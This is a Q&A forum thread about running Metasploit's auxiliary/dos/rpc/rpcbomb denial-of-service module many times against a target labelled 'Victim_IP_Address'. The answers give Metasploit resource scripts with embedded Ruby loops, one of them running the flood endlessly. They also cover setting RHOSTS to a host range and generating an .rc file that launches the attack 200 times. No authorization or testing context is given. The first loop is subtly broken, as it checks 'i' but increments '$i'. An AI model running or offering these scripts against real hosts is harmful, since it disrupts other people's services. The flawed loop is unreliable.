# How to run a meterpreter script multiple times

Tags: metasploit, meterpreter

I have this very simple script to run a rpcbomb script from auxiliary/dos/rpc/rpcbomb for a DOS attack.

```
use auxiliary/dos/rpc/rpcbomb
set RHOSTS Victim_IP_Address
set RPORT 111
exploit -j -z
```

I want to run the script about 10 times but I cant find any method to do so

Answer (score 0, accepted):

It is not possible to create loops with Meterpreter commands in the `.rc` script alone, but luckily [Meterpreter scripting supports Ruby](https://www.offensive-security.com/metasploit-unleashed/meterpreter-scripting/) with all of its looping methods. An example with the `while` loop, 10 iterations:

```
use auxiliary/dos/rpc/rpcbomb
set RHOSTS 192.0.2.1
set RPORT 111

<ruby>

$i = 0

while i < 10
    run_single("exploit -j -z")
    $i += 1
end

</ruby>
```

Or an infinite loop which also waits two seconds before running the exploit again:

```
use auxiliary/dos/rpc/rpcbomb
set RHOSTS 192.0.2.1
set RPORT 111

<ruby>

while true
    run_single("exploit -j -z")
    run_single("sleep 2s")
end

</ruby>
```

Comment: Yes this is perfect. Thank you so much

Answer (score -1):

If you want to target many hosts, If I remember you can set a range in the RHOSTS variable like this

```
set RHOSTS 192.168.1.1-192.168.1.10
```

But If you want to run it 10 times for the same target, you should program a script or run

```
exploit -j -z
```

10 times

Comment: Hi so you are saying just type ```exploit -j -z``` 10 times right? I used that value as an example. Lets say I need to run it 200 times. Any tips?

Comment: MMM well, in this case, I would say to you to program your own script with bash for example. This script will write into an .rc file all MSF command like set RHOSTS... And at the end, it should contains a loop which write "exploit -j" 200 times into the same .rc file.  After your rc file is generated, you can run metasploit with "msfconsole -r myrcfile.rc" and it will automatically set all your commands